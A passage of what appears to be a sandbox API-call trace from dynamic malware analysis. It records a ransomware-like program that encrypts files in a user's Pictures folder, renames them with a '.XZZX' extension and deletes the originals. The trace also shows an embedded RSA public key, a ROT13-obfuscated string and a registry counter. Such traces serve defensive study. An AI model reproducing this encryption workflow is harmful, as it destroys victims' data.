dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17079 [0125.710] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.710] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1707e [0125.711] SetErrorMode (uMode=0x1) returned 0x1 [0125.711] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.711] OutputDebugStringW (lpOutputString="end") [0125.711] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.711] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0125.711] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce3380) returned 1 [0125.711] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce3380, dwCertEncodingType=0x1, pInfo=0x3d0d618*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d648*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d650*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cdde98) returned 1 [0125.711] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.712] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.712] CryptEncrypt (in: hKey=0x3cdde98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0125.712] CryptEncrypt (in: hKey=0x3cdde98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce3408*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce3408*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0125.712] WriteFile (in: hFile=0x604, lpBuffer=0x3ce3408*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce3408*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0125.712] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.712] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.712] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0125.712] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.712] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x608) returned 0x0 [0125.713] RegQueryValueExW (in: hKey=0x608, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x96, lpcbData=0x420dfdc*=0x4) returned 0x0 [0125.713] RegCloseKey (hKey=0x608) returned 0x0 [0125.713] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x608) returned 0x0 [0125.713] RegSetValueExW (in: hKey=0x608, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x97, cbData=0x4 | out: lpData=0x420dfec*=0x97) returned 0x0 [0125.713] RegCloseKey (hKey=0x608) returned 0x0 [0125.713] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.713] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.713] CloseHandle (hObject=0x604) returned 1 [0125.715] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.715] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.715] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LiEtBonze.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lietbonze.png")) returned 1 [0125.717] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LiEtBonze.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lietbonze.png")) returned 0 Thread: id = 415 os_tid = 0x98c [0125.718] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.718] lstrcpyW (in: lpString1=0x434f460, lpString2="mXMMLg1uw.bmp" | out: lpString1="mXMMLg1uw.bmp") returned="mXMMLg1uw.bmp" [0125.718] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.718] SetErrorMode (uMode=0x1) returned 0x1 [0125.718] lstrcpyW (in: lpString1=0x434f860, lpString2="mXMMLg1uw.bmp" | out: lpString1="mXMMLg1uw.bmp") returned="mXMMLg1uw.bmp" [0125.718] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x82300651, Data2=0xa61c, Data3=0x4d44, Data4=([0]=0xb7, [1]=0xe6, [2]=0x6c, [3]=0x9a, [4]=0x7, [5]=0x2, [6]=0x1e, [7]=0x21))) returned 0x0 [0125.718] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mXMMLg1uw.bmp") returned 56 [0125.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0125.718] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\615936DC32228B708230065136576FB8.XZZX") returned 80 [0125.718] StrStrW (lpFirst="mXMMLg1uw.bmp", lpSrch="XZZX") returned 0x0 [0125.718] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mXMMLg1uw.bmp", dwFileAttributes=0x20) returned 1 [0125.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mXMMLg1uw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mxmmlg1uw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0125.719] ReadFile (in: hFile=0x5f4, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x10d67, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x434e418*=0x10d67, lpOverlapped=0x0) returned 1 [0125.721] CloseHandle (hObject=0x5f4) returned 1 [0125.721] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0125.721] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0125.722] SetErrorMode (uMode=0x1) returned 0x1 [0125.722] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0125.722] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce3490) returned 1 [0125.725] CryptGenKey (in: hProv=0x3ce3490, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0125.814] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0125.814] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0125.814] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.815] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.815] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0125.815] CryptReleaseContext (hProv=0x3ce3490, dwFlags=0x0) returned 1 [0125.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\615936DC32228B708230065136576FB8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\615936dc32228b708230065136576fb8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0125.815] WriteFile (in: hFile=0x5f4, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x10d67, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x434e438*=0x10d67, lpOverlapped=0x0) returned 1 [0125.816] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10d67 [0125.817] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0125.817] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10d6c [0125.817] WriteFile (in: hFile=0x5f4, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x1a, lpOverlapped=0x0) returned 1 [0125.817] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10d86 [0125.817] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0125.817] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10d8b [0125.817] SetErrorMode (uMode=0x1) returned 0x1 [0125.817] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0125.817] OutputDebugStringW (lpOutputString="end") [0125.817] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0125.817] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0125.817] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3ce3490) returned 1 [0125.818] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce3490, dwCertEncodingType=0x1, pInfo=0x3d0d6e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d718*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d720*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cdded8) returned 1 [0125.818] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.818] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0125.818] CryptEncrypt (in: hKey=0x3cdded8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0125.818] CryptEncrypt (in: hKey=0x3cdded8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce3518*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce3518*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0125.818] WriteFile (in: hFile=0x5f4, lpBuffer=0x3ce3518*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce3518*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0125.818] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0125.818] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0125.818] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0125.819] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0125.819] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x608) returned 0x0 [0125.819] RegQueryValueExW (in: hKey=0x608, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x97, lpcbData=0x434dfdc*=0x4) returned 0x0 [0125.819] RegCloseKey (hKey=0x608) returned 0x0 [0125.819] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x608) returned 0x0 [0125.819] RegSetValueExW (in: hKey=0x608, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x98, cbData=0x4 | out: lpData=0x434dfec*=0x98) returned 0x0 [0125.819] RegCloseKey (hKey=0x608) returned 0x0 [0125.819] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.819] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.820] CloseHandle (hObject=0x5f4) returned 1 [0125.821] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0125.821] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0125.821] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mXMMLg1uw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mxmmlg1uw.bmp")) returned 1 [0125.823] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\mXMMLg1uw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\mxmmlg1uw.bmp")) returned 0 Thread: id = 416 os_tid = 0x990 [0125.851] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0125.851] lstrcpyW (in: lpString1=0x420f460, lpString2="oEKbZ-fUq6tWCg3E9gms.gif" | out: lpString1="oEKbZ-fUq6tWCg3E9gms.gif") returned="oEKbZ-fUq6tWCg3E9gms.gif" [0125.851] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0125.852] SetErrorMode (uMode=0x1) returned 0x1 [0125.852] lstrcpyW (in: lpString1=0x420f860, lpString2="oEKbZ-fUq6tWCg3E9gms.gif" | out: lpString1="oEKbZ-fUq6tWCg3E9gms.gif") returned="oEKbZ-fUq6tWCg3E9gms.gif" [0125.852] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x49835ef2, Data2=0xf37c, Data3=0x4012, Data4=([0]=0xb5, [1]=0x97, [2]=0xb3, [3]=0x38, [4]=0xf0, [5]=0x8e, [6]=0x39, [7]=0xe))) returned 0x0 [0125.852] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oEKbZ-fUq6tWCg3E9gms.gif") returned 67 [0125.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0125.852] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4EC1B3383CF01EB849835EF241110300.XZZX") returned 80 [0125.852] StrStrW (lpFirst="oEKbZ-fUq6tWCg3E9gms.gif", lpSrch="XZZX") returned 0x0 [0125.852] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oEKbZ-fUq6tWCg3E9gms.gif", dwFileAttributes=0x20) returned 1 [0125.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oEKbZ-fUq6tWCg3E9gms.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oekbz-fuq6twcg3e9gms.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0125.852] ReadFile (in: hFile=0x604, lpBuffer=0x4360048, nNumberOfBytesToRead=0xbba6, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesRead=0x420e418*=0xbba6, lpOverlapped=0x0) returned 1 [0125.854] CloseHandle (hObject=0x604) returned 1 [0125.854] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0125.854] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0125.855] SetErrorMode (uMode=0x1) returned 0x1 [0125.855] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0125.855] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce35a0) returned 1 [0125.857] CryptGenKey (in: hProv=0x3ce35a0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0125.965] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.965] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0125.965] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0125.965] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0125.965] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0125.965] CryptReleaseContext (hProv=0x3ce35a0, dwFlags=0x0) returned 1 [0125.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4EC1B3383CF01EB849835EF241110300.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4ec1b3383cf01eb849835ef241110300.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x604 [0125.966] WriteFile (in: hFile=0x604, lpBuffer=0x4360048*, nNumberOfBytesToWrite=0xbba6, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesWritten=0x420e438*=0xbba6, lpOverlapped=0x0) returned 1 [0125.967] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbba6 [0125.967] WriteFile (in: hFile=0x604, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0125.967] SetFilePointer (in: hFile=0x604, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbbab [0125.967] WriteFile (in: hFile=0x604, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x30, lpOverlapped=0x0) returned 1 [0125.967] 